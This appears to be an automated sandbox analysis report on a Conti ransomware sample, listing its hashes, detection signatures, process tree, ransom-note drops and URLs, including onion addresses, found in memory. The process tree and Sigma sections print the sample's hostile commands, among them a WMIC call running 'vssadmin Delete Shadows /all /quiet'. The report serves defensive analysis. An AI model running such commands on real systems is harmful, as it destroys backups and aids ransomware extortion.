Loading ...

Play interactive tourEdit tour

Analysis Report 7906dc47_by_Libranalysis

Overview

General Information

Sample Name:7906dc47_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:419877
MD5:7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1:e7304e2436dc0eddddba229f1ec7145055030151
SHA256:1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
Infos:

Most interesting Screenshot:

Detection

Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Yara detected Conti ransomware
Contains functionality to create processes via WMI
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Suspicious Svchost Process
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shadow Copies Creation Using Operating Systems Utilities
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 7906dc47_by_Libranalysis.exe (PID: 5008 cmdline: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe' MD5: 7906DC475A8AE55FFB5AF7FD3AC8F10A)
    • sihost.exe (PID: 2952 cmdline: MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
      • cmd.exe (PID: 3764 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5376 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5920 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 772 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • svchost.exe (PID: 2996 cmdline: MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • cmd.exe (PID: 1752 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6160 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5468 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6248 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • svchost.exe (PID: 3020 cmdline: MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • cmd.exe (PID: 6540 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6612 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • taskhostw.exe (PID: 2736 cmdline: MD5: CE95E236FC9FE2D6F16C926C75B18BAF)
  • cmd.exe (PID: 1156 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6192 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
      • WMIC.exe (PID: 6440 cmdline: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 4084 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6276 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
      • WMIC.exe (PID: 6488 cmdline: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6380 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6508 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
  • cmd.exe (PID: 6412 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6552 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: svchost.exe PID: 3020JoeSecurity_Conti_ransomwareYara detected Conti ransomwareJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Shadow Copies Deletion Using Operating Systems UtilitiesShow sources
    Source: Process startedAuthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Copying Sensitive Files with Credential DataShow sources
    Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Suspicious Svchost ProcessShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe' , ParentImage: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, ParentProcessId: 5008, ProcessCommandLine: , ProcessId: 2996
    Sigma detected: Shadow Copies Creation Using Operating Systems UtilitiesShow sources
    Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
    Source: Process startedAuthor: vburov: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe' , ParentImage: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, ParentProcessId: 5008, ProcessCommandLine: , ProcessId: 2996

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 7906dc47_by_Libranalysis.exeVirustotal: Detection: 42%Perma Link
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\IPKGELNTQY\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\IPKGELNTQY\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\NEBFQQYWPS\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Downloads\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\taskhostw.exeFile created: C:\Users\Public\readme.txt
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB058206B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW,
    Source: C:\Windows\System32\sihost.exeCode function: 3_2_0000024D2C4106B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000024843FF06B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000020A025A06B2 FindFirstFileExW,
    Source: C:\Windows\System32\taskhostw.exeCode function: 30_2_00000255F9EB06B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW,

    Networking:

    barindex
    Found Tor onion addressShow sources
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzj
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzj
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzj
    Source: readme.txt.3.drString found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzj
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: http://amplify-imp.outbrain.com/pixel?p=nlV1YHXXXKgnJTkmjxGkpD86h377hQIinq23IJiX9nqxEkupAtbFH4fSP0Iz
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: http://b1-use2.zemanta.com/bidder/win/outbrainrtb/c333bcb0-98dc-11e9-8919-320929a4a620/0.564833/3F66
    Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272901005.00000255FA2F8000.00000002.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
    Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
    Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
    Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
